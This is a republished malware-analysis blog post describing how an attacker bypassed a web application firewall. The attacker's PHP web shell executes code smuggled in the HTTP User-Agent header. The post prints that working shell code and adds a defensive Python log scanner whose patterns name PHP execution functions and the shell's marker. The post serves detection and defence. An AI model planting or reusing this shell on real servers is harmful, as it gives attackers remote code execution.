Republished Malware Analysis Blog Posts From March 2018

WAF Evasion Using HTTP User Agent String

Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won’t prevent a site from being compromised if the site contains underlying vulnerabilities.

In the case I will describe in this post, an attacker was able to leverage a file upload vulnerability to place a PHP web shell on a victim server. However, a WAF in place was preventing the attacker from executing code through their web shell using POST or GET parameters.

To work around this, another PHP shell was dropped, designed to execute code placed in the User Agent string of the requests made to the shell.

The malicious code:

// eregi() (removed in PHP 7) case-insensitively matches "final" anywhere in the
// User-Agent, so requests from normal browsers fall through without executing anything.
if (eregi("final", $_SERVER['HTTP_USER_AGENT'])) {
    // Strip the fixed prefix and execute whatever follows it as PHP.
    eval(str_replace('Mozilla/5.0 (3.1.final) ', '', $_SERVER['HTTP_USER_AGENT']));
    die;
}

In this case, the deployed WAF was only designed to spot potentially malicious activity in locations where user-supplied data was expected, like the values of POST and GET parameters and COOKIE variables.

It’s important to remember, however, that an attacker controls every part of the requests they make to the server – including the contents of the User Agent string.
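As an added defender-side example (not from the original post), a small Python scanner that reviews web server access logs for the gap described above: PHP-looking code, or the shell's fixed "3.1.final" prefix, arriving in the User-Agent header. The combined log format, the token list and the sample log lines are assumptions constructed for this example.

```python
import re

# PHP-looking tokens to look for in the User-Agent, which a WAF tuned only for
# GET/POST/COOKIE values never inspects. "3.1.final" is the shell's fixed prefix.
PHP_CODE_TOKENS = re.compile(
    r"\$_(?:GET|POST|COOKIE|SERVER|REQUEST)\b"
    r"|\b(?:eval|assert|system|passthru|shell_exec|exec|base64_decode)\s*\("
    r"|<\?php|(?<![\w.])\$[A-Za-z_]\w*\s*=|;\s*\}?\s*$",
    re.IGNORECASE,
)
KNOWN_SHELL_MARKERS = ("3.1.final",)

# Apache/nginx "combined" format: ip - user [time] "request" status bytes "referer" "ua"
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

def user_agent_findings(ua: str) -> list[str]:
    """Return the reasons (possibly none) a User-Agent looks like smuggled PHP."""
    findings = []
    for marker in KNOWN_SHELL_MARKERS:
        if marker in ua:
            findings.append(f"known shell marker: {marker}")
    if PHP_CODE_TOKENS.search(ua):
        findings.append("PHP code tokens in User-Agent")
    if len(ua) > 512:  # real browser UAs are far shorter than a code payload
        findings.append(f"oversized User-Agent ({len(ua)} bytes)")
    return findings

def scan_access_log(lines) -> list[dict]:
    # Parse combined-format lines and return those whose User-Agent is suspect.
    hits = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these too
        findings = user_agent_findings(m["ua"])
        if findings:
            hits.append({"ip": m["ip"], "request": m["req"], "findings": findings})
    return hits

# Constructed sample lines (not from the original incident): a normal browser
# request, then a request to an uploaded file that carries PHP in the User-Agent.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2018:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 1234 '
    '"-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/58.0"',
    '203.0.113.9 - - [10/Mar/2018:12:00:07 +0000] "GET /uploads/img.php HTTP/1.1" 200 87 '
    '"-" "Mozilla/5.0 (3.1.final) echo 1;"',
]
```

Run against the sample, only the second line is reported; in production the same check belongs in the WAF rule set itself, not just in after-the-fact log review.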

Final Thoughts:

While this is not a common WAF bypass methodology in my experience, it’s certainly interesting and worth being aware of.

Malware Research

Original Research and Blog Posts by Sky Larsen